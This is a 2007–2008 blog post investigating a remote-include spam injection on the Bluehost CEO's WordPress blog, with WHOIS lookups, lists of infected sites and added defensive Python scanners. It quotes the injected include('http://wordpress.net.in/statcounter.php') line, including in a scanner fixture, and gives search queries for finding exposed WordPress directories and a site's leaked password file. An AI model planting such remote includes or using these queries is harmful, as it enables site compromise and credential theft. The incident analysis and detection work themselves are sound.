Dec 11 2007 - Matt Heaton's blog has been cleaned. At the moment he's running the latest version of WordPress (2.3.x), and most of the blogs listed in this article have been upgraded as well.
Jan 26th, 2008 - It seems the Bluehost engineers did a poor job of cleaning; the goro spam is back.
Just after the recent issue with wordpress.com.cn, there is a new WordPress imitator: a remote spamware injection by wordpress.net.in.
I was reading a post Matt Heaton published 2 days ago when I found a bunch of spamware links in his WordPress footer.
Matt is using the default WordPress theme (Kubrick) with a single JavaScript snippet for AdSense. The only way the spam can get in is probably via PHP injection or by manual editing. All the spamware redirects to a howardowens.com/?order=XX page.
Lookup for howardowens.com
The diagram below explains the lookup results for howardowens.com (click on the image to enlarge).
Surprisingly, the spammer's website is also hosted by bluehost.com (69.89.16.0/20, 74.220.192.0/19; 69.89.16.4 -> box183.bluehost.com).
Tracking the spam sources.
Viewing the mattheaton.com HTML source I found some hints and started searching for xanax intext:id="goro". Google returned 2 results for this query.
- 1. WordPress Support: "php get footer adding spam code?"
- 2. elijahzarwan.net: div id="Goro" (nice headline)
Both sites show the same type of PHP injection method:
include('http://wordpress.net.in/statcounter.php');
The statcounter.php file is just plain text (text/plain) full of spam links. The spam content on Matt Heaton's blog is generated randomly from http://wordpress.net.in/[random]/ where random = 1 - 9.
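A scanner for the injection pattern described above, added here as an example (it is not code from the original post). It walks a directory of PHP files and reports include/require statements whose argument is an http:// or https:// URL, the form include('http://wordpress.net.in/statcounter.php') takes, together with the id="goro" div marker the injected block carries. The two theme files it scans are constructed inline so the script runs offline; on a real install point scan_tree() at the WordPress root.

```python
"""Scan a WordPress install for the remote-include spam injection.

Added example, not code from the original post. The sample header.php and
footer.php below are constructed to mimic a clean and an injected theme file.
"""
import os
import re
import tempfile

# include/require/include_once/require_once followed by a quoted http(s) URL
REMOTE_INCLUDE = re.compile(
    r"\b(include|require)(?:_once)?\s*\(?\s*['\"](https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)
# the id="goro" marker seen on the infected blogs
GORO_MARKER = re.compile(r"""id\s*=\s*["']goro["']""", re.IGNORECASE)


def scan_file(path):
    """Return a list of (path, line_number, kind, detail) findings for one file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            match = REMOTE_INCLUDE.search(line)
            if match:
                findings.append((path, lineno, "remote_include", match.group(2)))
            if GORO_MARKER.search(line):
                findings.append((path, lineno, "goro_marker", line.strip()))
    return findings


def scan_tree(root):
    """Scan every .php file under root (theme and core files alike)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(".php"):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


# Constructed sample theme files: a clean header and an injected footer.
CLEAN_HEADER = "<?php wp_head(); ?>\n</head>\n<body>\n"
INFECTED_FOOTER = (
    "<?php wp_footer(); ?>\n"
    '<div id="goro">\n'
    "<?php include('http://wordpress.net.in/statcounter.php'); ?>\n"
    "</div>\n"
    "</body></html>\n"
)


def build_sample_install():
    """Write the constructed files into a temporary 'WordPress' tree; return its root."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    theme = os.path.join(root, "wp-content", "themes", "default")
    os.makedirs(theme)
    with open(os.path.join(theme, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HEADER)
    with open(os.path.join(theme, "footer.php"), "w", encoding="utf-8") as fh:
        fh.write(INFECTED_FOOTER)
    return root


if __name__ == "__main__":
    sample_root = build_sample_install()
    for finding in scan_tree(sample_root):
        print(finding)
```

The regex only catches a URL written literally in the include; an include built from a variable or from base64_decode() output needs manual review, which is why the goro marker is checked separately as a second signal.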
Raw whois for wordpress.net.in
Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
Note: the registrant address, 1 Red Square, is a famous restaurant in Moscow.
It's pretty obvious that wordpress.net.in is registered through a registrar in India.
Live examples of the wordpress.net.in injection
Google query: warning "[function.include]" allintext: "wordpress.net.in". Use Fiddler or any HTTP inspector to trace the full request headers.
- 1. Evan Morris - WordPress 2.0.6 | url | screenshot
- 2. carwax - WordPress 1.5.2 | url | screenshot
- 3. aabenthus.biz - WordPress 2.0.x | url | screenshot
- 4. mythinger.com - WordPress 2.0.2 | url | screenshot
- 5. classicalanglican.net - WordPress 2.0.2 | url | screenshot
- 6. echo9er.net - WordPress 1.5.1 | url | screenshot
- 7. boyarick.com - WordPress 2.0.2 | url | screenshot
Google directory search for class-mail.php
Search for class-mail.php in open (publicly listed) directories:
"parent directory" class-mail.php -html -htm -php -shtml -md5 -md5sums
- jean-cyril.com - wp-includes: spam links redirect to www.901am.com/?page=2157. jean-cyril.com has a wp-info.txt file inside its wp-includes directory; this text file holds the unserialized database password and related data.
- floaridablog.org - wp-includes: spam redirects to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell); the offending spam page has been removed by the UML maintainer.
Hiding from search engine spiders
First, I did some comparative searches on archive.org for howardowens.com and mattheaton.com. It turns out both sites blocked the IA Archiver a few months before the spam started showing in their footers. Check the howardowens index on archive.org to understand my suspicion.
- http://web.archive.org/web/*/http://www.howardowens.com
- http://web.archive.org/web/*/http://www.mattheaton.com
Out of boredom I cloaked myself as the following agents:
- Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
- Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
- Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
- Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com
Not much changed on either site. Then I read the status header: it returned 404 instead of 200. A nice trick for stopping crawlers and spiders from spying on their joy-ride spam house.
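The same comparison as a script, added here as an example (not code from the original post): fetch one URL as a browser and as each of the crawler user agents listed above, then compare status codes and body fingerprints so that a 404-for-spiders answer, or a body that silently drops the spam block for crawlers, shows up as cloaking. The `fetch` parameter is a hypothetical callable (url, user_agent) -> (status, body); `urllib_fetch` is a real implementation for checking a live site, `simulated_fetch` is a constructed stand-in that behaves like the spammed sites so the script runs offline, and BROWSER_UA is an assumed Firefox string.

```python
"""Detect user-agent cloaking: do crawlers get a different answer than a browser?

Added example, not code from the original post. simulated_fetch is constructed
to mimic the observed behaviour (404 for crawler user agents, spam for browsers).
"""
import hashlib
import urllib.error
import urllib.request

# assumed browser user agent string
BROWSER_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"

# the crawler user agents the post impersonated
CRAWLER_UAS = {
    "yahoo-slurp": "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "ask-teoma": "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
    "mediapartners": "Mediapartners-Google/2.1",
}


def urllib_fetch(url, user_agent, timeout=10):
    """Fetch url with the given User-Agent; return (status, body) even on HTTP errors."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.getcode(), response.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


CRAWLER_HINTS = ("Slurp", "Googlebot", "Teoma", "Mediapartners")


def simulated_fetch(url, user_agent):
    """Constructed stand-in for a spammed site: 404 for crawlers, spam page for browsers."""
    if any(hint in user_agent for hint in CRAWLER_HINTS):
        return 404, b"<html><body>Not Found</body></html>"
    return 200, b"<html><body><div id='goro'>spam links</div></body></html>"


def fingerprint(body):
    """Short SHA-256 of the body so content is compared, not byte-for-byte strings."""
    return hashlib.sha256(body).hexdigest()[:16]


def check_cloaking(url, fetch=urllib_fetch, crawlers=CRAWLER_UAS, browser_ua=BROWSER_UA):
    """Return (browser_status, report); report maps crawler name -> what differed."""
    base_status, base_body = fetch(url, browser_ua)
    base_fp = fingerprint(base_body)
    report = {}
    for name, ua in crawlers.items():
        status, body = fetch(url, ua)
        report[name] = {
            "status": status,
            "status_differs": status != base_status,
            "content_differs": fingerprint(body) != base_fp,
        }
    return base_status, report


def is_cloaked(report):
    """True if any crawler got a different status or content than the browser did."""
    return any(r["status_differs"] or r["content_differs"] for r in report.values())


if __name__ == "__main__":
    # offline demonstration; pass fetch=urllib_fetch to test a real URL
    base, rep = check_cloaking("http://example.test/", fetch=simulated_fetch)
    print("browser status:", base)
    for name, r in rep.items():
        print(f"{name:14} status={r['status']} differs={r['status_differs'] or r['content_differs']}")
    print("cloaking suspected:", is_cloaked(rep))
```

A body comparison alone would flag sites that rotate ads or timestamps, so on a live site run it twice as the browser first: if the two browser fetches already differ, only the status-code column is meaningful.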
Summary
Bits & bytes from this incident; what we know:
- Most of the injected sites are running WordPress 2.0.6 and below
- allow_url_fopen must be set to true for this injection to work
- Most of the blog owners are unaware of the spam links (cloaking)
Check out Murray's access log; it will give you some idea of the remote injection methods.
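A php.ini check for the allow_url_fopen point in the summary, added here as an example (not code from the original post). PHP 5.2 and later split the behaviour in two: allow_url_fopen lets fopen()/file_get_contents() read URLs, and include/require of a URL is additionally gated by allow_url_include, so both are reported. The two php.ini samples are constructed, one with the weak settings the injection relies on and one hardened; a directive missing from the file is evaluated with PHP's own default.

```python
"""Report php.ini directives that make include('http://...') pull remote code.

Added example, not code from the original post. WEAK_INI and HARDENED_INI
are constructed samples; parse_php_ini() is a minimal reader, not PHP's parser.
"""

# strings PHP treats as true for boolean ini directives
TRUTHY = {"1", "on", "true", "yes"}

# directive -> (PHP default when the directive is absent, why it matters here)
RISKY = {
    "allow_url_fopen": ("On", "fopen()/file_get_contents() can read http:// URLs"),
    "allow_url_include": ("Off", "include/require can execute remote PHP (PHP >= 5.2)"),
}


def parse_php_ini(text):
    """Minimal php.ini reader: drops ; comments and [sections], lower-cases keys."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # assumes no ';' inside values
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def php_bool(value):
    """Interpret an ini value the way PHP does for boolean directives."""
    return value.strip().lower() in TRUTHY


def audit_ini(text):
    """Return {directive: enabled} for every RISKY directive, defaults applied."""
    settings = parse_php_ini(text)
    return {
        name: php_bool(settings.get(name, default))
        for name, (default, _reason) in RISKY.items()
    }


def risky_enabled(text):
    """Names of RISKY directives that are effectively on, in RISKY order."""
    return [name for name, on in audit_ini(text).items() if on]


# Constructed samples: the weak configuration and its hardened counterpart.
WEAK_INI = """\
[PHP]
; typical shared-hosting settings of the era
allow_url_fopen = On
allow_url_include = On
"""

HARDENED_INI = """\
[PHP]
allow_url_fopen = Off      ; use curl for the few scripts that need remote fetches
allow_url_include = Off
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, "->", risky_enabled(ini) or "nothing risky")
        for name in risky_enabled(ini):
            print("   ", name + ":", RISKY[name][1])
```

On a shared host where php.ini is not editable, the same two directives can usually be set per site from .htaccess (php_flag) or a user ini file; check the effective values with phpinfo() rather than trusting the file on disk.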
Update
- Dec 03 2007 - All the spam links to howardowens.com pages have been removed. I haven't talked with Howard Owens, but I assume Howard's site was injected the same way as Matt Heaton's blog.
- Dec 04 2007 - Mattheaton.com has a minor update: the spam is now injected in both header and footer, pointing at tangonoticias.com:7070/d_pill/577.html. As tangonoticias.com runs on the Joomla CMS, they created a static "WordPress" on port 7070 (the Real Networks server & RTSP port). This is probably the work of a different attacker, taking advantage of Matt Heaton's blind spot. Google Cache (Nov 12)
- Dec 11 2007 - Matt Heaton has been purified. He's now using the latest version of WordPress (2.3.1). You can still view the injected version in the Google cache & screenshot.
Related Post
- How to Remove wordpress.net.in Spam Injection
- Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II
External Links
- Bluehost Hostmonster CEO’s blog
- DNS Lookup results for wordpress.net.in
- Aboutus.org wiki on MattHeaton.com
- National Vulnerability Database (NVD) on WordPress 2.0 > 2.0.5 vulnerabilities
- Murray's Blog: My Wordpress Cracked
- pseudo-flaw - more random wordpress blogs owned by seo spammers
No Responses to “Matt Heaton BlueHost HostMonster CEO Official Blog Hacked”